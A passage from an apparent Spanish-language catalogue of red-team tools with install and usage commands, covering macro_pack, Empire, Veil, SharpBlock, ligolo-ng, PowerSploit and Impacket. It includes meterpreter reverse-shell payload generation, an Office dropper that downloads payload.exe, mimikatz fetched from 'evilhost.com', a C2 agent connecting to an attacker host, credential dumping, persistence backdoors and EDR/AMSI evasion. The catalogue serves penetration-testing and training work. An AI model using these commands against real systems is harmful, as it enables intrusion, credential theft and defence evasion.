Para generar la plantilla del cargador, la biblioteca dinámica donut.dll, la biblioteca estática donut.lib y el generador donut.exe. Inicie un Símbolo del sistema para desarrolladores de Microsoft Visual Studio x64, cambie al directorio donde clonó el repositorio de Donut e ingrese lo siguiente:```bash
nmake -f Makefile.msvc

Para hacer lo mismo, excepto usando MinGW-64 en Windows o Linux, cambie al directorio donde clonó el repositorio de Donut e ingrese lo siguiente:```bash make -f Makefile.mingw

root@kitploit:~
**Instalación: (Linux)**```bash
pip3 install donut-shellcode

Uso:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
Para obtener información completa de uso, consulte la [página de GitHub](https://github.com/TheWover/donut/#4-usage) de donut.

Vea [una publicación reciente en el blog](https://thewover.github.io/Bear-Claw/) de The Wover para más información.

![image](https://assets.kitploit.com/production/public/readmes/495/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

Una herramienta utilizada para automatizar la ofuscación y generación de documentos de Office, scripts VB, accesos directos y otros formatos para red teaming.

**Instalación: (Binario)**

1. Obtenga el último binario desde [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Descargue el binario en un PC con Microsoft Office genuino instalado.
3. Abra la consola, CD al directorio del binario y ejecute el binario.

**Instalación: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Uso:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

Una colección de scripts y módulos de PowerShell que pueden usarse para lograr diversos objetivos de red teaming.

Algunas de las características de PowerSploit:

- Extraer hashes de contraseñas y recuperar contraseñas en texto claro de la memoria
- Escalar privilegios y eludir controles de seguridad
- Ejecutar código arbitrario de PowerShell y evadir restricciones de ejecución
- Realizar reconocimiento y descubrimiento de red
- Generar payloads y ejecutar exploits

**Instalación:** _1. Guardar en la carpeta de módulos de PowerShell_

Primero deberá descargar la [carpeta de PowerSploit](https://github.com/PowerShellMafia/PowerSploit) y guardarla en la carpeta de módulos de PowerShell.

La ruta de la carpeta de módulos de PowerShell se puede encontrar con el siguiente comando:```
$Env:PSModulePath

Instalación: 2. Instalar PowerSploit como un módulo de PowerShell

Luego, deberá instalar el módulo PowerSploit (use el nombre de la carpeta descargada).

Nota: Su política de ejecución de PowerShell podría bloquearlo, para solucionarlo ejecute el siguiente comando.

`Set-ExecutionPolicy Unrestricted```` powershell.exe -ep bypass

root@kitploit:~
Ahora puedes instalar el módulo PowerSploit.```
Import-Module PowerSploit

Uso:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

Una herramienta que se puede utilizar para realizar diversas acciones relacionadas con entornos de Microsoft Active Directory (AD), como volcar hashes de contraseñas, crear/eliminar usuarios y modificar propiedades de usuarios.

Algunas de las funcionalidades de Rubeus:

- Kerberoasting
- Ataques de golden ticket
- Ataques de silver ticket

**Instalación: (Descargar)**

Puede instalar el binario no oficial precompilado de Rubeus [aquí](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).

**Instalación: (Compilar)**

Rubeus es compatible con [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra el [proyecto .sln](https://github.com/GhostPack/Rubeus) de rubeus, elija "Release" y compile.

**Uso:**```
Rubeus.exe -h

image

🔙SharpUp

Una buena herramienta para verificar un endpoint de víctimas en busca de vulnerabilidades relacionadas con procesos de alta integridad, grupos, rutas secuestrables, etc.

Instalación: (Descarga)

Puedes instalar el binario SharpUp precompilado no oficial aquí.

Instalación: (Compilar)

SharpUp es compatible con Visual Studio 2015 Community Edition. Abre el proyecto .sln de SharpUp, elige "Release" y compila.

Uso:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) es un sistema de gestión de bases de datos relacional desarrollado y comercializado por Microsoft.

Este kit de herramientas C# para MS-SQL está diseñado para reconocimiento ofensivo y post-explotación. Para obtener información detallada sobre el uso de cada técnica, consulte la [wiki](https://github.com/skahwah/SQLRecon/wiki).

**Instalación: (Binario)**

Puede descargar la última versión binaria desde [aquí](https://github.com/skahwah/SQLRecon/releases).

**Uso:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

La información de uso completo se puede encontrar en la wiki.

La información sobre el uso del módulo de la herramienta se puede encontrar aquí.

image

Imagen utilizada de la página de ayuda de SQLRecon

🔙UltimateAppLockerByPassList

Este recurso es una colección de las técnicas más comunes y conocidas para eludir AppLocker.

Dado que AppLocker se puede configurar de diferentes maneras, @api0cradle mantiene una lista verificada de bypasses (que funcionan contra las reglas predeterminadas de AppLocker) y una lista con posibles técnicas de bypass (según la configuración) o que alguien afirma que son un bypass.

También tienen una lista de técnicas de bypass genéricas, así como una lista heredada de métodos para ejecutar a través de DLLs.

Listas indexadas

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

Imagen utilizada de https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

Un lanzador de Empire basado en JavaScript y VBScript, que se ejecuta dentro de su propio host de PowerShell integrado.

Ambos lanzadores se ejecutan dentro de su propio host de PowerShell integrado, por lo que no necesitamos PowerShell.exe.

Esto puede ser útil cuando una empresa bloquea PowerShell.exe y/o utiliza una solución de listas blancas de aplicaciones, pero no bloquea la ejecución de archivos JS/VBS.

Uso:

  • Configurar un nuevo Listener dentro de PowerShell Empire
  • Usar el comando Launcher para generar un lanzador de PowerShell para este listener
  • Copiar y reemplazar el payload del lanzador codificado en Base64 dentro del archivo JavaScript o VBScript de StarFighter

Para la versión de JavaScript, usa la siguiente variable:```javascript var EncodedPayload = "";

root@kitploit:~
Para la versión VBScript use la siguiente variable:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • Luego ejecute: wscript.exe StarFighter.js o StarFighter.vbs en el objetivo, o haga doble clic en los lanzadores dentro del Explorador.

imagen

Imagen usada de https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

El objetivo de este proyecto es generar archivos .html que contengan un archivo HTA cifrado.

La idea es que cuando su objetivo visite la página, la clave se obtiene y el HTA se descifra dinámicamente dentro del navegador y se envía directamente al usuario.

Esta es una técnica de evasión para sortear la inspección de contenido/tipo de archivo implementada por algunos dispositivos de seguridad.

Más información técnica aquí.

Instalación:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**Uso:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

Imagen utilizada de https://github.com/nccgroup/demiguise

Persistencia

🔙Impacket

Impacket proporciona un conjunto de enlaces de Python de bajo nivel para varios protocolos de red, incluyendo SMB, Kerberos y LDAP, así como bibliotecas de alto nivel para interactuar con servicios de red y realizar tareas específicas como volcar hashes de contraseñas y crear recursos compartidos de red.

También incluye una serie de herramientas de línea de comandos que pueden usarse para realizar diversas tareas como volcar bases de datos SAM, enumerar confianzas de dominio y descifrar contraseñas de Windows.

Instalación:```bash python3 -m pip install impacket

root@kitploit:~
**Instalación: (Con scripts de ejemplo)**

Descarga y extrae [el paquete](https://github.com/fortra/impacket), luego navega a la carpeta de instalación y ejecuta...```bash
python3 -m pip install .

Uso:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
Gran [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) para el uso de Impacket.

![image](https://assets.kitploit.com/production/public/readmes/495/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire es un framework de post-explotación que permite generar payloads para establecer conexiones remotas con sistemas víctima.

Una vez que un payload se ha ejecutado en un sistema víctima, establece una conexión de vuelta al servidor Empire, que luego se puede usar para enviar comandos y controlar el sistema objetivo.

Empire también incluye una serie de módulos y scripts integrados que se pueden usar para realizar tareas específicas, como volcar hashes de contraseñas, acceder al registro de Windows y extraer datos.

**Instalación:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Uso:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
Uso útil [chuleta](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) por [HarmJoy](https://github.com/HarmJ0y).

![image](https://assets.kitploit.com/production/public/readmes/495/3dec2ca6692f2b6431159a32830e854fa994824b8bcf12c797c0bda8a186519d.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

Un conjunto de herramientas de persistencia para Windows escrito en C#.

El proyecto tiene una [wiki](https://github.com/mandiant/SharPersist/wiki).

**Instalación: (Binario)**

Puede encontrar la versión más reciente [aquí](https://github.com/mandiant/SharPersist/releases).

**Instalación: (Compilar)**

- Descargue los archivos del proyecto desde el [Repositorio de GitHub](https://github.com/mandiant/SharPersist).
- Cargue el proyecto de Visual Studio y vaya a "Herramientas" --> "Administrador de paquetes NuGet" --> "Configuración del Administrador de paquetes"
- Vaya a "Administrador de paquetes NuGet" --> "Orígenes de paquetes"
- Agregue un origen de paquete con la URL "https://api.nuget.org/v3/index.json"
- Instale el paquete NuGet Costura.Fody. Se necesita la versión anterior de Costura.Fody (3.3.3) para no requerir Visual Studio 2019.
  - `Install-Package Costura.Fody -Version 3.3.3`
- Instale el paquete TaskScheduler
  - `Install-Package TaskScheduler -Version 2.8.11`
- ¡Ahora puede compilar el proyecto usted mismo!

**Uso:**

Se puede encontrar una lista completa de ejemplos de uso [aquí](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng es una herramienta simple, ligera y rápida que permite a los pentesters establecer túneles desde una conexión TCP/TLS inversa utilizando una interfaz tun (sin necesidad de SOCKS).

En lugar de usar un proxy SOCKS o reenviadores TCP/UDP, Ligolo-ng crea una pila de red en espacio de usuario utilizando Gvisor.

Al ejecutar el servidor relay/proxy, se utiliza una interfaz tun; los paquetes enviados a esta interfaz se traducen y luego se transmiten a la red remota del agente.

Instalación: (Descargar)

Los binarios precompilados (Windows/Linux/macOS) están disponibles en la página de lanzamiento.

Instalación: (Compilar)

Compilando ligolo-ng (se requiere Go >= 1.17):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**Configuración: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

Configuración: (Windows)

Necesitas descargar el controlador Wintun (usado por WireGuard) y colocar el archivo wintun.dll en la misma carpeta que Ligolo (asegúrate de usar la arquitectura correcta).

Configuración: (Servidor proxy)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**Uso:**

_Inicia el agente en tu computadora objetivo (víctima) (¡no se requieren privilegios!):_```bash
./agent -connect attacker_c2_server.com:11601

Una sesión debería aparecer en el servidor proxy.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
Use el comando session para seleccionar el agente.```
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

La información completa de uso se puede encontrar aquí.

image

Imagen usada de https://github.com/nicocha30/ligolo-ng#demo

Escalada de Privilegios

🔙LinPEAS

LinPEAS es una herramienta de escalada de privilegios muy detallada para encontrar rutas locales de privesc en endpoints Linux.

Instalación + Uso:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS es una buena herramienta de escalada de privilegios verbosa para encontrar rutas de escalada local en endpoints de Windows.

**Instalación + Uso:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

Linux smart enumeration es otra buena herramienta de escalada de privilegios para Linux, menos verbosa.

Instalación + Uso:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

Certify es una herramienta en C# para enumerar y abusar de configuraciones incorrectas en los Servicios de Certificado de Active Directory (AD CS).

Certify está diseñada para ser utilizada junto con otras herramientas y técnicas de equipo rojo, como Mimikatz y PowerShell, para permitir a los miembros del equipo rojo realizar varios tipos de ataques, incluidos ataques de intermediario, ataques de suplantación y ataques de escalada de privilegios.

**Características principales de Certify:**

- Creación de certificados
- Firma de certificados
- Importación de certificados
- Modificación de confianza de certificados

**Instalación: (Compilar)**

Certify es compatible con [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra el proyecto Certify [.sln](https://github.com/GhostPack/Certify), seleccione "Release" y compile.

**Instalación: (Ejecutar Certify a través de PowerShell)**

Si desea ejecutar Certify en memoria a través de un envoltorio de PowerShell, primero compile Certify y codifique en base64 el ensamblado resultante:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify puede cargarse entonces en un script de PowerShell con lo siguiente (donde "aa..." se reemplaza con la cadena de ensamblaje de Certify codificada en base64):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
El método Main() y cualquier argumento pueden ser invocados de la siguiente manera:```
[Certify.Program]::Main("find /vulnerable".Split())

Las instrucciones completas de compilación se pueden encontrar aquí.

Uso:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
Se puede encontrar un recorrido completo del ejemplo [aquí](https://github.com/GhostPack/Certify#example-walkthrough).

![image](https://assets.kitploit.com/production/public/readmes/495/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPassword es un script de PowerShell parte del kit de herramientas PowerSploit, diseñado para recuperar contraseñas de cuentas locales creadas y gestionadas mediante las Preferencias de directiva de grupo (GPP).

Get-GPPPassword funciona buscando en la carpeta SYSVOL del controlador de dominio cualquier archivo GPP que contenga información de contraseñas. Una vez que encuentra estos archivos, descifra la información de la contraseña y la muestra al usuario.

**Instalación:**

Siga las [instrucciones de instalación](https://github.com/A-poc/RedTeam-Tools#powersploit) de PowerSploit desde esta hoja de herramientas.```bash
powershell.exe -ep bypass
Import-Module PowerSploit

Uso:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

Script de PowerShell para encontrar rápidamente parches de software faltantes para vulnerabilidades de escalada de privilegios locales.

_Admite:_

- MS10-015 : Modo de Usuario a Ring (KiTrap0D)
- MS10-092 : Programador de Tareas
- MS13-053 : Desbordamiento del Pool del Kernel Win32k por NTUserMessageCall
- MS13-081 : Página NULL de Win32k en TrackPopupMenuEx
- MS14-058 : Desreferencia de Puntero Nulo en Win32k por TrackPopupMenu
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : Desbordamiento de Búfer del Controlador de Fuentes
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : Manejador de Inicio de Sesión Secundario
- MS16-034 : EoP en Controladores en Modo Kernel de Windows
- MS16-135 : Elevación de Privilegios en Win32k
- CVE-2017-7199 : Agente Nessus 6.6.2 - 6.10.3 Escalada de Privilegios

**Instalación: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Uso: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

_Imagen utilizada de https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/_

### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)

Watson es una herramienta .NET diseñada para enumerar KBs faltantes y sugerir exploits para vulnerabilidades de escalada de privilegios.

Ideal para identificar parches faltantes y sugerir exploits que puedan utilizarse para explotar vulnerabilidades conocidas con el fin de obtener privilegios más altos en el sistema.

**Instalación:**

Usando [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Abra el [archivo .sln del proyecto Watson](https://github.com/rasta-mouse/Watson), elija "Release" y compile.

**Uso:**```bash
# Run all checks
Watson.exe

imagen

Texto de imagen utilizado de https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

Una herramienta basada en C# que automatiza el proceso de descubrimiento y explotación de secuestros de DLL en binarios objetivo.

Las rutas secuestradas descubiertas pueden ser armadas, durante un engagement, para evadir los EDR.

Instalación:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • DLL de confirmación personalizadas :
    • Estos son archivos DLL que ayudan a la herramienta a obtener la confirmación de si las DLL se han cargado correctamente desde la ruta de secuestro identificada
    • Compilados del proyecto MalDLL proporcionado arriba (o usa los binarios precompilados si confías en mí!)
    • El nombre de la DLL de 32 bits debe ser: maldll32.dll
    • El nombre de la DLL de 64 bits debe ser: maldll64.dll
    • Instalar paquete NuGet: PeNet -> https://www.nuget.org/packages/PeNet/ (Prerequisito al compilar el proyecto ImpulsiveDLLHijack)

Nota: los requisitos i & ii deben colocarse en el directorio del propio ImpulsiveDLLHijacks.exe.

  • Información de compilación y configuración:

    • ImpulsiveDLLHijack

      • Clona el repositorio en Visual Studio
      • Una vez que el proyecto está cargado en Visual Studio, ve a "Project" --> "Manage NuGet packages" --> Busca paquetes e instala "PeNet" -> https://www.nuget.org/packages/PeNet/
      • ¡Compila el proyecto!
      • El ImpulsiveDLLHijack.exe estará dentro del directorio bin.
    • Y para las DLL de confirmación:

      • Clona el repositorio en Visual Studio
      • Compila el proyecto con x86 y x64
      • Renombra la versión x86 como maldll32.dll y la versión x64 como maldll64.dll
    • Configuración: Copia las DLL de confirmación (maldll32 & maldll64) en el directorio de ImpulsiveDLLHijack.exe y luego ejecuta ImpulsiveDLLHijack.exe :))

Instrucciones de instalación de https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Uso:```bash

Help

ImpulsiveDLLHijack.exe -h

Look for vulnerabilities in an executable

ImpulsiveDLLHijack.exe -path BINARY_PATH

root@kitploit:~
Ejemplos de uso se pueden encontrar [aquí](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples).

![imagen](https://assets.kitploit.com/production/public/readmes/495/acedd276f532d4b77d4a5f9d0d93f9d926ba6b0afd1da582b94410c32eb47ea1.png)

_Imagen utilizada de https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples_

### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)

Una herramienta en C# para volcar todo tipo de cosas útiles de AD FS.

Creado por Doug Bienstock [@doughsec](https://twitter.com/doughsec) mientras estaba en Mandiant FireEye.

Esta herramienta está diseñada para ejecutarse junto con ADFSpoof. ADFSdump generará toda la información necesaria para generar tokens de seguridad usando ADFSpoof.

**Requisitos:**

- ADFSDump debe ejecutarse bajo el contexto de usuario de la cuenta de servicio de AD FS. Puede obtener esta información ejecutando un listado de procesos en el servidor de AD FS o desde la salida del cmdlet Get-ADFSProperties. Solo la cuenta de servicio de AD FS tiene los permisos necesarios para acceder a la base de configuración. Ni siquiera un DA puede acceder a esto.
- ADFSDump asume que el servicio está configurado para usar la base de datos interna de Windows (WID). Aunque sería trivial admitir un servidor SQL externo, esta característica no existe actualmente.
- ADFSDump debe ejecutarse localmente en un servidor de AD FS, NO en un proxy de aplicación web de AD FS. La WID solo se puede acceder localmente a través de una tubería con nombre.

**Instalación: (Compilar)**

ADFSDump fue compilado para .NET 4.5 con Visual Studio 2017 Community Edition. Simplemente abra el proyecto .sln, elija "Release" y compile.

**Uso: (Banderas)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

Blog - Explorando el ataque Golden SAML contra ADFS

imagen

Imagen usada de https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs

Evasión de Defensas

🔙Invoke-Obfuscation

Un ofuscador de comandos y scripts de PowerShell compatible con PowerShell v2.0+. Si un punto final víctima es capaz de ejecutar PowerShell, entonces esta herramienta es excelente para crear scripts muy ofuscados.

Instalación:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

root@kitploit:~
**Uso:**```bash
./Invoke-Obfuscation

image

🔙Veil

Veil es una herramienta para generar payloads de metasploit que evitan las soluciones antivirus comunes.

Se puede utilizar para generar shellcode ofuscado, consulte el blog oficial de veil framework para más información.

Instalación: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent

root@kitploit:~
**Instalar: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Uso:```bash

List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-payloads

List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-encoders

Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

List all payloads (–list-payloads) for the tool Evasion (-t Evasion)

./Veil.py -t Evasion --list-payloads

Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

root@kitploit:~
Veil creators wrote a nice [blog post](https://www.veil-framework.com/veil-command-line-usage/) explaining further ordnance and evasion command line usage.

![image](https://assets.kitploit.com/production/public/readmes/495/81bc6fbd0f46783257bcb6d33b67781336ee9d270182aeff0e5e568f8ac4e613.png)

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)

Un método para evadir las DLL de proyección activa de EDR al evitar la ejecución del punto de entrada.

**Características:**

- Bloquea la ejecución del punto de entrada de las DLL de EDR, lo que impide que se coloquen hooks de EDR.
- Bypass AMSI sin parches que es indetectable para escáneres que buscan parches de código de Amsi.dll en tiempo de ejecución.
- Proceso anfitrión que se reemplaza con un implant PE que se puede cargar desde disco, HTTP o pipe con nombre (Cobalt Strike).
- El proceso implantado se oculta para ayudar a evadir escáneres que buscan procesos hollowed.
- Los argumentos de línea de comandos se suplantan y se implantan después de la creación del proceso usando un método sigiloso de detección de EDR.
- Bypass de ETW sin parches.
- Bloquea la invocación de NtProtectVirtualMemory cuando el destinatario está dentro del rango del espacio de direcciones de una DLL bloqueada.

**Instalación:**

Use [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) para compilar el binario de SharpBlock.

Abra el proyecto [.sln](https://github.com/CCob/SharpBlock) de SharpBlock, elija "Release" y compile.

**Uso:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Nice PenTestPartners blog post aquí.

image

Imagen extraída de https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatraz es un ofuscador de binarios x64 con interfaz gráfica que puede ofuscar varios archivos PE diferentes, incluyendo:

  • .exe
  • .dll
  • .sys

Algunas funciones de ofuscación compatibles incluyen:

  • Ofuscación de movimientos inmediatos
  • Aplanamiento del flujo de control
  • Mutación ADD
  • Ofuscación del punto de entrada
  • Ofuscación Lea

Instalación: (Requisitos)

Instalar: https://vcpkg.io/en/getting-started.html```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows

root@kitploit:~
**Uso:**

Usando la GUI para ofuscar un binario:

1. Carga un binario haciendo clic en `file` en la esquina superior izquierda.
2. Agrega funciones expandiendo el árbol `Functions`. (Puedes buscar escribiendo el nombre en la barra de búsqueda en la parte superior)
3. Presiona `compile` (**Nota:** _Ofuscar muchas funciones puede tomar algunos segundos_)

![imagen](https://assets.kitploit.com/production/public/readmes/495/98ae60c1a4f287f33bd749166514e95f2ba9cdab72850a77025dd743ca52e32a.png)

_Imagen utilizada de https://github.com/weak1337/Alcatraz_

### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)

Mangle es una herramienta que manipula aspectos de ejecutables compilados (.exe o DLL).

Mangle puede eliminar cadenas basadas en Indicadores de Compromiso (IoC) conocidos y reemplazarlas con caracteres aleatorios, modificar el archivo inflando su tamaño para evitar EDRs, y puede clonar certificados de firma de código de archivos legítimos.

Al hacerlo, Mangle ayuda a los loaders a evadir escáneres en disco y en memoria.

**Instalación:**

El primer paso, como siempre, es clonar el repositorio. Antes de compilar Mangle, necesitas instalar las dependencias. Para instalarlas, ejecuta los siguientes comandos:```
